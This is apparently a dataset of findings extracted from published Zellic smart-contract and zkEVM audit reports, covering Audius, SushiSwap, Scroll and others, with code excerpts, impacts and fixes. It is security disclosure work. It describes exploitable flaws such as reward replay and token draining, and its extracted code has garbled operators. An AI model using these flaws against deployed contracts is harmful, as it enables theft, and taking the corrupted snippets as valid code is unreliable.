fol- lowing formula: uint256 maximumMintAmount = (totalSupply() * mintCapNumerator) / MINT_CAP_DENOMINATOR; Below is the mint function: function mint(address _recipient, uint256 _amount) public onlyOwner { uint256 maximumMintAmount = (totalSupply() * mintCapNumerator) / MINT_CAP_DENOMINATOR; if (_amount > maximumMintAmount) { revert MantleToken_MintAmountTooLarge(_amount, maximumMintAmount); } if (block.timestamp < nextMint) revert MantleToken_NextMintTimestampNotElapsed(block.timestamp, nextMint); nextMint = block.timestamp + MIN_MINT_INTERVAL; _mint(_recipient, _amount); } If the totalSupply and mintCapNumerator are small enough, they might round down to zero when divided by MINT_CAP_DENOMINATOR. This would revert the transaction be- cause of the if condition following the calculation, and an admin would not be able to mint the tokens. It is advised to use the mintCapNumerator and _initialSupply at a value large enough so the above calculations do not round down the maximumMintAmo unt to zero. The mint function would revert. Zellic Mantle Network Set the _initialSupply in initialize and mintCapNumerator using setMintCapNumerator to values large enough so the division does not round down the maximumMintAmount to zero. Mantle Network rejected this finding and provided the response below: In our practical use case, it is unlikely to encounter situations where totalSupply and mintCapNumerator are too small. The situation mentioned in the report does not exist. Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Custom proxy architecture", + "labels": [ + "Zellic" + ], + "body": "Target: STBT.sol Category: Code Maturity Likelihood: Medium Severity: Medium : Low STBT will be deployed through a proxy contract, a common design that allows up- grading the code of a contract. STBT implements a custom proxy, which has strong constraints in the ability to up- grade the contract code and is arguably more error prone than other existing alterna- tives. Specifically, the storage layouts of the custom proxy implementation UpgradeableS TBT and of the implementation STBT are required to not clash. This is implemented by replicating the initial part of the storage layout of the implementation contract in the proxy. The STBT contract storage has an uint[300] array of placeholders, where UpgradableSTBT stores the address of the implementation contract. contract UpgradeableSTBT is Proxy { /) override address public owner; address public issuer; address public controller; address public moderator; /) new state below address public implementation; /) ...)) } contract STBT is Ownable, ISTBT { /) all the following three roles are contracts of governance/TimelockController.sol address public issuer; address public controller; address public moderator; Zellic Matrixdock uint[300] public placeholders; ///)) ...)) } This coupling of storage layouts is unusual and unnecessary; other proxy implementa- tions move the address of the implementation contract to a different storage location (via inline assembly), in order to not interfere with the implementation storage layout. This issue does not describe an exploitable security vulnerability in the code as re- viewed and is therefore reported as low severity. However, we believe this design choice introduces a higher risk of errors when upgrading the contract. We recommend evaluating the adoption of one of the several de facto standard proxy architectures that have been developed and proven effective, such as UUPSUpgrade- able. Matrixdock acknowledged the finding and will not remediate at this time. Zellic Matrixdock", + "html_url": "https://github.com/Zellic/publications/blob/master/Matrixdock-STBT - Zellic Audit Report.pdf" + }, + { + "title": "3.2 High rate of failures in test suite", + "labels": [ + "Zellic" + ], + "body": "Target: stbt-test.js Category: Code Maturity Likelihood: High Severity: Medium : Low One of the routine steps performed during the evaluation of a codebase is inspection of the accompanying test suite. When running the test suite using the instructions available in the README, we observed a failure rate of 52% (24 out of 46). Integrating a comprehensive test suite with a continuous integration service is tremen- dously important for preventing bugs from being deployed. For example, for one of the tests within it(\u201credeem: errors\u201d...))), it expects a revert to happen because of NO_SEND_PERMISSION, when the revert cause is because the msg .sender is not the issuer. await expect(stbt.connect(alice).redeem(123, '0x')) .to.be.revertedWith(\u201cNO_SEND_PERMISSION\u201d); We recommend fixing the failing tests and running the tests automatically (e.g., by integrating them with a CI service or in Git hooks). Matrixdock states that this issue was caused by an unsynced test file. The finding was fixed in commit 06c46695 and now all tests pass. Zellic Matrixdock", + "html_url": "https://github.com/Zellic/publications/blob/master/Matrixdock-STBT - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing PDA validation leading to multiple transfers", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Rewards are redeemed using a two-step process. First, signed messages are submit- ted and stored on-chain in an account of type VerifiedMessages. When the required amount of signed messages has been submitted, the EvaluateAttestations instruction is invoked to process the transfer. The instruction performs a number of checks on the provided accounts and then performs the token transfer to the destination account. In order to avoid a single transfer being repeated multiple times, a PDA is created (tr ansfer_account_info), marking the transfer as completed. The PDA is unique for the transfer since the address is derived from the details of the transfer, including a unique ID. In addition, the account containing the VerifiedMessages is deleted by zeroing its lamports. Both these measures are flawed and can be bypassed. The transfer_account_info account is not checked to be the intended PDA. An at- tacker can supply any signer account as an input to the transaction, and the account will be created successfully. This is because any signer account can be passed to the create_account system instruction, even if the invoke_signed function is used to per- form an invocation with signer seeds for the intended PDA. The signer seeds will just be ignored as they do not correspond to any account in the subtransaction. It is also possible to reuse the VerifiedMessages account, despite it having zero lam- ports, by referencing it in multiple instructions within the same transaction. This spe- cific issue is discussed more in detail in finding 3.3. It is possible to redeem rewards multiple times. We confirmed this issue by modifying an existing test. Ensure that the transfer_account_info account matches the expected PDA. Properly invalidate the data stored in the VerifiedMessages accounts so that it cannot be reused Zellic Audius, Inc even within the same transaction. The Audius team was alerted of this issue while the audit was ongoing. The issue was acknowledged within 10 minutes, and a remediation patch was suggested within 40 minutes. The patch was quickly deployed after review from both Zellic and Au- dius engineers to ensure a complete fix to the issue. The complete timeline of events follows (times in UTC, October 15th): 17:52 Audius is informed of the issue 18:02 Audius acknowledges the issue 18:31 Audius proposes a remediation 18:35 Zellic confirms that proposed remediation patches the issue, suggesting additional changes to invalidate VerifiedMessages accounts ~21:45 Audius finalizes remediation commits, including suggested additional changes ~22:00 Zellic confirms that remediation patches the issue ~22:00 Audius deploys and tests patch on testnet 23:31 Audius deploys patch on mainnet Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Ambiguous format for signed messages", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Code Maturity Likelihood: N/A Severity: Informational : Informational Verified messages are serialized as the concatenation of multiple fields separated by an underscore: /) Valid senders message let valid_message = [ transfer_data.eth_recipient.as_ref(), b\u201c_\u201d, transfer_data.amount.to_le_bytes().as_ref(), b\u201c_\u201d, transfer_data.id.as_ref(), b\u201c_\u201d, bot_oracle.eth_address.as_ref(), ] .concat(); This format is inherently prone to ambiguities. Consider the example of the following amount and id variations (other fields left out for simplicity): amount: id: _myid message: 123__myid amount: 123_ id: myid message: 123__myid The same message can be obtained by composing different amounts and ids. This issue can potentially be exploited to submit manipulated values to invocations of process_evaluate_attestations. The Audius team claimed amounts and ids containing underscores (0x5f bytes) cannot be generated by the relevant off-chain programs; Zellic Audius, Inc therefore, the issue is not exploitable in practice. For this reason this potentially critical issue is reported as informational. Even though the issue might not be exploitable at the time of this security audit, we strongly advise to review the message format to make ambiguities impossible in or- der to to harden the code and avoid being exposed to a risk of a critical issue. One remediation option would be to adopt a serialization format where the various fields have a fixed length. Another more flexible (but more complex and bug-prone) option would be to adopt a tag-length-value encoding (or just length-value). The Audius team acknowledged this finding. No change to the codebase was deemed to be immediately required. Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unsafe account deletion method", + "labels": [ + "Zellic" + ], + "body": "Target: Rewards Manager Category: Coding Mistakes Likelihood: N/A Severity: Low : Low The EvaluateAttestations instruction processes an account of type VerifiedMessages containing signed assertions authorizing the transfer of a given amount of tokens to a specific account. Towards the end of the instruction, the VerifiedMessages account is deleted by zeroing its lamports. This account deletion method is unsafe and prone to abuse. The reason is that account deletion does not happen immediately after an instruction is finished processing, and a zero-lamports account is usable by other instructions within the same transaction. It is possible to reuse a VerifiedMessages account after an EvaluateAttestations in- struction has been processed, despite it having zero lamports, by referencing the same account in multiple instructions within the one transaction. This issue was part of the exploit for issue 3.1. Invalidate or immediately delete VerifiedMessages. Invalidating the account can be done by zeroing the version field, thus making unpac king the account fail. Truly and fully deleting the account is not possible; however, it is possible to achieve an equivalent effect by zeroing the account lamports, resizing the account to zero, and transferring the account ownership to the system program. The Audius team was alerted of this issue while the audit was ongoing, together with issue 3.1. The Audius team quickly applied a remediation that invalidates the account, making unpack fail. Zellic Audius, Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius Solana - Zellic Audit Report.pdf" + }, + { + "title": "5.1 Missing registry check in restrict", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Coding Mistakes Likelihood: Low Severity: Low : Low Each ERC721Restrictable token has an associated registry contract for managing re- strictions. The restrict function in MightyNetERC721RestrictedRegistry does not check whether the contract itself is set as the target token\u2019s registry. function restrict( address tokenContract, uint256[] calldata tokenIds ) external override onlyRole(RESTRICTOR_ROLE) nonReentrant whenNotPaused { uint256 tokenCount = tokenIds.length; if (tokenCount =) 0) { revert InvalidTokenCount(tokenCount); } for (uint256 i = 0; i < tokenCount; +)i) { uint256 tokenId = tokenIds[i]; if (!ERC721Restrictable(tokenContract).exists(tokenId)) { revert InvalidToken(tokenContract, tokenId); } bytes32 tokenHash = keccak256( abi.encodePacked(tokenContract, tokenId) ); if (_isRestricted(tokenHash)) { revert TokenAlreadyRestricted(tokenContract, tokenId); } _tokenRestrictions[tokenHash] = msg.sender; } emit Restricted(tokenContract, tokenIds); } Zellic Mighty Bear Games This behavior would exacerbate upgrade or configuration issues in other contracts that interact with ERC721Restrictable tokens. If a contract tries to restrict a token using the incorrect registry contract, the action will fail silently. This might allow users to earn rewards on unlocked tokens. The restrict function should include an assertion that restrictedRegistry in the to- ken contract indeed matches address(this). Alternatively, Mighty Bear Games could add a separate safeRestrict function that includes this check. Mighty Bear Games acknowledges this finding.They added an assertion as recom- mended to the beginning of the scope of the restrict function in the V2 contract. If the assertion fails, it reverts with a newly introduced error ContractNotUsingThisRest rictedRegistry(address tokenContract). Mighty Bear Games has provided the response below: by adding the registry check to MightyNetERC721RestrictedRegistryV2. MightyNetERC721RestrictedRegistry was already deployed on ethereum. MightyNetERC721RestrictedRegistryV2 will be deployed on our L2 chain. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "5.2 Restriction pattern creates centralization risk", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Business Logic Likelihood: Low Severity: Low : Low The MightyNetERC721RestrictedRegistry contract gives approved users or contracts the ability to restrict specific tokens. function restrict( address tokenContract, uint256[] calldata tokenIds ) external override onlyRole(RESTRICTOR_ROLE) nonReentrant whenNotPaused { uint256 tokenCount = tokenIds.length; if (tokenCount =) 0) { revert InvalidTokenCount(tokenCount); } for (uint256 i = 0; i < tokenCount; +)i) { uint256 tokenId = tokenIds[i]; if (!ERC721Restrictable(tokenContract).exists(tokenId)) { revert InvalidToken(tokenContract, tokenId); } bytes32 tokenHash = keccak256( abi.encodePacked(tokenContract, tokenId) ); if (_isRestricted(tokenHash)) { revert TokenAlreadyRestricted(tokenContract, tokenId); } _tokenRestrictions[tokenHash] = msg.sender; } emit Restricted(tokenContract, tokenIds); } Any address with the RESTRICTOR_ROLE can invoke this function to restrict any token in any token contract, without approval by users. Further, only the address that added a token\u2019s restriction is able to remove the restriction. Zellic Mighty Bear Games This exposes all assets to risks in approved contracts. If any such contracts experience key compromises, upgrade issues, or implementation vulnerabilities, then arbitrary assets might become locked. Additionally, this restriction pattern requires that both the admin and all approved contracts are highly trusted by users. We recommend that Mighty Bear Games implement a system where users first approve restrictions, use token transfers to hold staked assets, or clearly document trust assumptions associated with restrictors. Mighty Bear Games acknowledges this. As per their response, they have decided to go with the third recommendation and clearly document trust assumptions with restrictors. The following is their provided response: We are updating the readme to address this. Once the next deployment is done, we are planning to create a public github repository so that this readme can be player facing. We will also link to the repository from the whitepaper and a public facing FAQ page. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "5.3 Unnecessary complexity in _tokenRestrictions structure", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC721RestrictedRegistry Category: Code Maturity Likelihood: N/A Severity: Informational : Informational The MightyNetERC721RestrictedRegistry contract tracks restricted tokens by hashing a token\u2019s tokenContract address and tokenId value together, resulting in a tokenHash that is then stored in the contract. For instance, in the isRestricted function: bytes32 tokenHash = keccak256(abi.encodePacked(tokenContract, tokenId)); Then, tokenHash is used as a key for the _tokenRestrictions mapping to account for restricted tokens. mapping(bytes32 => address) private _tokenRestrictions; Together, they are used in the form _tokenRestrictions[tokenHash] multiple times in the contract. This adds unnecessary complexity in terms of maintainability and readability of the contract code. Additionally, the current implementation consumes slightly more gas than is needed. We recommend using a traditional nested mapping in order to improve the maintain- ability, readability, and gas efficiency of the contract: mapping(address => mapping(uint256 => address)) private _tokenRestrictions; Then, the state of a given token can be accessed with _tokenRestrictions[tokenCont ract][tokenId]. Zellic Mighty Bear Games might Bear Games acknowledges this. They have replaced their previously imple- mented _tokenRestrictions structure with a more efficient one as per our recom- mendation. The following is theire provided response: We have made this change to MightyNetERC721RestrictedRegistryV2. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNet - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The RouteProcessor3 should not hold nontransient tokens", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor3.sol Category: Business Logic Likelihood: N/A Severity: Informational : Informational There are numerous ways in which tokens can be stolen if they are held by the RoutePro- cessor3. For example, one way is by directly asking the contract to wrap or unwrap Ether and transfer it to the user. function wrapNative(uint256 stream, address from, address tokenIn, uint256 amountIn) private { uint8 directionAndFake = stream.readUint8(); address to = stream.readAddress(); if (directionAndFake & 1 =) 1) { /) wrap native address wrapToken = stream.readAddress(); if (directionAndFake & 2 =) 0) IWETH(wrapToken).deposit{value: amountIn}(); if (to !) address(this)) IERC20(wrapToken).safeTransfer(to, amountIn); } else { /) unwrap native if (directionAndFake & 2 =) 0) { if (from !) address(this)) IERC20(tokenIn).safeTransferFrom(from, address(this), amountIn); IWETH(tokenIn).withdraw(amountIn); } payable(to).transfer(address(this).balance); } } The wrapNative function can be reached with from =) address(this) by going from processRouteInternal to processNative, listed below, Zellic Sushiswap function processNative(uint256 stream) private { uint256 amountTotal = address(this).balance; distributeAndSwap(stream, address(this), NATIVE_ADDRESS, amountTotal); } then requesting a wrapNative operation in the swap. The tokens belonging to RoutePro- cessor3 will then be wrapped or unwrapped and transferred to the user. The RouteProcessor3 contract should not hold tokens except transiently, in the middle of a transaction. Document prominently that the RouteProcessor3 contract should not hold tokens. This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The safePermit call can be front-run", + "labels": [ + "Zellic" + ], + "body": "Target: RouteProcessor3.sol Category: Business Logic Likelihood: N/A Severity: Informational : Informational In the RouteProcessor3, a user can provide a cryptographically signed permit that, when consumed, will allow the contract to send tokens on behalf of the user. function applyPermit(address tokenIn, uint256 stream) private { /)address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) uint256 value = stream.readUint(); uint256 deadline = stream.readUint(); uint8 v = stream.readUint8(); bytes32 r = stream.readBytes32(); bytes32 s = stream.readBytes32(); IERC20Permit(tokenIn).safePermit(msg.sender, address(this), value, deadline, v, r, s); } The values of the signature are visible in the mempool until the transaction is executed. An attacker could use the genuine signature to invoke the exact call to IERC20Permit. permit. This does not cause any loss of funds, as the contract will not send funds on behalf of anyone except msg.sender and itself. However, it will cause a subsequent transac- tion to fail on IERC20Permit.safePermit, since the nonce will be incremented and the signature cannot be used again. Potentially, ignore reverts caused by safePermit calls. The contract will revert anyway when attempting to transfer tokens that are not authorized. This prevents a frontrun from halting the transaction. Zellic Sushiswap This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Overflow in readBytes", + "labels": [ + "Zellic" + ], + "body": "Target: InputStream.sol Category: Coding Mistakes Likelihood: Low Severity: Informational : Informational The InputStream library can be used to treat a bytes variable as a read-only stream, managing a cursor that is incremented automatically as the stream is consumed. The readBytes function can be used to read a sequence of bytes from the stream. The sequence is encoded as a length, followed by the contents of the sequence. Since the length is user provided, we believe a potential integer overflow exists in the function. function readBytes(uint256 stream) internal pure returns (bytes memory res) { assembly { let pos :) mload(stream) res :) add(pos, 32) let length :) mload(res) mstore(stream, add(res, length)) } } The stream variable keeps track of the current position of the stream. It is updated with the new position after the sequence is read, by adding the length of the sequence, which is user-provided. This addition can overflow. This does not represent an exploitable security issue in the context of RouteProces- sor3, since the data provided to readBytes is controlled by the same user that invokes the contract. We also believe no reasonable usage of the contract would trigger this bug by accident. For these reasons, this is reported as informational, with the purpose of providing hardening suggestions for the InputStream library, which might be important if it was used in other contexts. Zellic Sushiswap Ensure the calculation of the new stream position does not overflow. This issue has been acknowledged by Sushiswap. Zellic Sushiswap", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiSwap RouteProcessor3 - Zellic Audit Report.pdf" + }, + { + "title": "1.1 RLP Circuit data table\u2019s byte_rev_idx is underconstrained", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Medium : Medium The RlpFsmDataTable consists of seven advice columns and aims to map (tx_id, for mat, byte_idx) to (byte_rev_idx, byte_value, bytes_rlc, gas_cost_acc). ///)) Data table allows us a lookup argument from the RLP circuit to check the byte value at an index ///)) while decoding a tx of a given format. #)derive(Clone, Copy, Debug)] pub struct RlpFsmDataTable { ///)) Transaction index in the batch of txs. pub tx_id: Column, ///)) Format of the tx being decoded. pub format: Column, ///)) The index of the current byte. pub byte_idx: Column, ///)) The reverse index at this byte. pub byte_rev_idx: Column, ///)) The byte value at this index. pub byte_value: Column, ///)) The accumulated Random Linear Combination up until (including) the current byte. pub bytes_rlc: Column, ///)) The accumulated gas cost up until (including) the current byte. pub gas_cost_acc: Column, } There are various checks on this table, and one of them specifies what should happen when the instance (tx_id, format) changes. Scroll /) if (tx_id' =) tx_id and format' !) format) or (tx_id' !) tx_id and tx_id' !) 0) cb.condition( sum:)expr([ /) case 1 and:)expr([ tx_id_check_in_dt.is_equal_expression.expr(), not:)expr(format_check_in_dt.is_equal_expression.expr()), ]), /) case 2 and:)expr([ not:)expr(is_padding_in_dt.expr(Rotation:)next())(meta)), not:)expr(tx_id_check_in_dt.is_equal_expression.expr()), ]), ]), |cb| { /) byte_rev_idx =) 1 cb.require_equal( \u201dbyte_rev_idx is 1 at the last index\u201d, meta.query_advice(data_table.byte_rev_idx, Rotation:)cur()), 1.expr(), ); /) byte_idx' =) 1 cb.require_equal( \u201dbyte_idx resets to 1 for new format\u201d, meta.query_advice(data_table.byte_idx, Rotation:)next()), 1.expr(), ); /) bytes_rlc' =) byte_value' cb.require_equal( \u201dbytes_value and bytes_rlc are equal at the first index\u201d, meta.query_advice(data_table.byte_value, Rotation:)next()), meta.query_advice(data_table.bytes_rlc, Rotation:)next()), ); }, ); Here, in the case where tx_id' =) tx_id and format' !) format, or tx_id' !) tx_id and tx_id' !) 0, it is constrained that the current byte_rev_idx should be 1. However, this condition misses the final byte of the final transaction ID, where tx_id' !) tx_ id and tx_id' =) 0 as the next transaction is a padding. This implies that the final Scroll byte of the final transaction ID may not have byte_rev_idx =) 1, breaking the desired properties over the byte_rev_idx for the entire final transaction ID. The RlpFsmDataTable is used for a lookup, and this byte_rev_idx is also used later for various constraints. Using potentially incorrect values for byte_rev_idx may lead to further issues. The condition can be simply modified to tx_id' =) tx_id and format' !) format, or tx_id' !) tx_id. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.2 Missing range check for byte values in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical Descripton There is a check for the byte_value in the data table to be within a byte range. meta.lookup_any(\u201dbyte value check\u201d, |meta| { let cond = and:)expr([ meta.query_fixed(q_enabled, Rotation:)cur()), is_padding_in_dt.expr(Rotation:)cur())(meta), ]); vec![meta.query_advice(data_table.byte_value, Rotation:)cur())] .into_iter() .zip(range256_table.table_exprs(meta).into_iter()) .map(|(arg, table)| (cond.expr() * arg, table)) .collect() }); However, with the condition applied, it actually only checks that the padding rows have byte_value within the byte range. This means that the actual data rows\u2019 byte_va lues are never range checked properly. The byte_values are never range checked to be within [0, 256) range, which is a needed check. Change the condition to let cond = and:)expr([ meta.query_fixed(q_enabled, Rotation:)cur()), not:)expr(is_padding_in_dt.expr(Rotation:)cur())(meta)), ]); Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.3 The tag_length is never checked to be no more than max_le ngth", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Medium : Medium The max_length is used to define the maximum length of each tag, and it is also used to decide the base to use to accumulate the byte values. However, there is no check that the tag_length is no more than max_length. The tag_length may be over max_length \u2014 so inputs that do not fit the desired speci- fications may pass all the constraints in the circuit. We recommend to add a constraint that checks tag_length <) max_length. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.4 Missing range checks for the LtChip", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs, Tx Circuit, tx_circuit.rs Severity: Critical Category: Underconstrained Cir- : Critical cuits Likelihood: High The LtChip itself does not constrain that the diff columns are within the byte range and delegates this check to the circuits using this chip. ///)) Config for the Lt chip. #)derive(Clone, Copy, Debug)] pub struct LtConfig { ///)) Denotes the lt outcome. If lhs < rhs then lt =) 1, otherwise lt =) 0. pub lt: Column, ///)) Denotes the bytes representation of the difference between lhs and rhs. ///)) Note that the range of each byte is not checked by this config. pub diff: [Column; N_BYTES], ///)) Denotes the range within which both lhs and rhs lie. pub range: F, } However, this is missing in the RLP circuits. For the ComparatorConfig, it is also important to check that the left hand side and the right hand side are all within the specified range. ///)) Tx id must be no greater than cum_num_txs tx_id_cmp_cum_num_txs: ComparatorConfig, Therefore, in the Tx Circuit, it should be checked that tx_id and cum_num_txs are within 16 bits. The missing range check on diff breaks the functionalities of the LtChip, so using LtC hip does not actually constrain the comparison properly. Scroll We recommend to add the needed range checks for safe usage of the comparison gadgets. This issue has been acknowledged by Scroll, and a fix was implemented in commit d0e7a07e. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.5 Missing check in the initialization on the state machine in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical In the RLP state machine initialization, the byte_idx is checked to be 1, and the tag is checked to be either TxType or BeginList. meta.create_gate(\u201dsm init\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let tag = tag_expr(meta); constrain_eq!(meta, cb, byte_idx, 1.expr()); cb.require_zero( \u201dtag =) TxType or tag =) BeginList\u201d, (tag.expr() - TxType.expr()) * (tag - BeginList.expr()), ); cb.gate(meta.query_fixed(q_first, Rotation:)cur())) }); There is a missing check that the initial state should be DecodeTagStart. There is also no check that the initial tx_id is 1. This missing check allows us to start the decoding with states like Bytes. This may potentially lead to allowing invalid RLP decodings. We recommend to implement a check that the initial state is DecodeTagStart and that the initial tx_id is 1. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.6 Transition to new RLP instance in the state machine is un- derconstrained in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical In the state machine, in the case where depth =) 1, state' !) End, and is_tag_end =) True, the machine regards this as the transition between two RLP instances. It then constrains that the next byte_idx is 1, next depth is 0, and next state is DecodeTagStart as well as that either tx_id' = tx_id + 1 or format' = format + 1. It also constrains the tag_next column of the current row to be either TxType or Begin List. cb.condition( meta.query_advice(transit_to_new_rlp_instance, Rotation:)cur()), |cb| { let tx_id = meta.query_advice(rlp_table.tx_id, Rotation:)cur()); let tx_id_next = meta.query_advice(rlp_table.tx_id, Rotation:)next()); let format = meta.query_advice(rlp_table.format, Rotation:)cur()); let format_next = meta.query_advice(rlp_table.format, Rotation:)next()); let tag_next = tag_next_expr(meta); /) state transition. update_state!(meta, cb, byte_idx, 1); update_state!(meta, cb, depth, 0); update_state!(meta, cb, state, DecodeTagStart); cb.require_zero( \u201d(tx_id' =) tx_id + 1) or (format' =) format + 1)\u201d, (tx_id_next - tx_id - 1.expr()) * (format_next - format Scroll - 1.expr()), ); cb.require_zero( \u201dtag =) TxType or tag =) BeginList\u201d, (tag_next.expr() - TxType.expr()) * (tag_next.expr() - BeginList.expr()), ); }, ); There are two issues. First, the constraint on (tx_id', format') is weak, as it allows cases like (tx_id', format') = (tx_id - 1, format + 1). The constraint on tag_next is also weak, as there are no constraints on the next offset\u2019s tag \u2014 it should constrain that tag' is either TxType or BeginList instead. This underconstraint may allow the same transaction to appear twice in the state ma- chine and the first tag for a new RLP instance to not be equal to TxType or BeginList. We recommend to implement proper checks for (tx_id', format') as well as tag' for the transition. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.7 Equality between tag_value and the final tag_value_acc not checked", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical In the Bytes state in the state machine, the byte values are accumulated over a column tag_value_acc. The final value of this tag_value_acc is the actual tag_value, which should be stored in the table for other use. However, in the Bytes => DecodeTagStart case where tag_index = tag_length, there is no check that tag_value = tag_value_a cc. /) Bytes => DecodeTagStart cb.condition(tidx_eq_tlen, |cb| { /) assertions emit_rlp_tag!(meta, cb, tag_expr(meta), false); /) state transitions. update_state!(meta, cb, tag, tag_next_expr(meta)); update_state!(meta, cb, state, State:)DecodeTagStart); constrain_unchanged_fields!(meta, cb; rlp_table.tx_id, rlp_table.format, depth); }); Since tag_value is actually not constrained, the value that is actually in the RlpFsmRlp Table is not constrained. We recommend adding the check that tag_value is equal to tag_value_acc. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.8 Missing do_not_emit! constraints", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The do_not_emit! macro is used to force is_output = false. This is used in various places where the current row does not represent a full tag value. However, in the DecodeTagStart => LongList transition, this check is missing. meta.create_gate(\u201dstate transition: DecodeTagStart => LongList\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let (bv_gt_0xf8, bv_eq_0xf8) = byte_value_gte_0xf8.expr(meta, None); let cond = and:)expr([ sum:)expr([bv_gt_0xf8, bv_eq_0xf8]), not:)expr(is_tag_end_expr(meta)), ]); cb.condition(cond.expr(), |cb| { /) assertions. constrain_eq!(meta, cb, is_tag_begin, true); /) state transitions update_state!(meta, cb, tag_length, byte_value_expr(meta) - 0xf7.expr()); update_state!(meta, cb, tag_idx, 1); update_state!(meta, cb, tag_value_acc, byte_value_next_expr(meta)); update_state!(meta, cb, state, State:)LongList); constrain_unchanged_fields!(meta, cb; rlp_table.tx_id, rlp_table.format, tag, tag_next); }); cb.gate(and:)expr([ meta.query_fixed(q_enabled, Rotation:)cur()), is_decode_tag_start(meta), Scroll ])) }); In this case, the is_output is not constrained to be false, so the RlpFsmRlpTable may have invalid rows with is_output turned on, even though it should be turned off. We recommend adding a do_not_emit! macro in this case as well. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.9 The state machine is not constrained to end at End", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: High : High There are no constraints that the state machine ends with the state End. The state machine at the final transaction does not necessarily have to move to the End state. This means that the checks for the Case 4 in the DecodeTagStart => Deco deTagStart case can be potentially skipped \u2014 which includes the RLC, gas cost, and byte_rev_idx checks. We recommend adding a fixed column q_last, implementing the assign logic, and adding the constraint that the state is End if q_last is enabled. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.10 Enum definition is inconsistent with the circuit layout", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, witness/tx.rs Category: Code Maturity Likelihood: N/A Severity: Informational : Informational The Tx Circuit layout is composed of the fixed part with the transaction-related values of fixed size, followed by the dynamic part with the transaction calldata, which is not of fixed size. The layout for 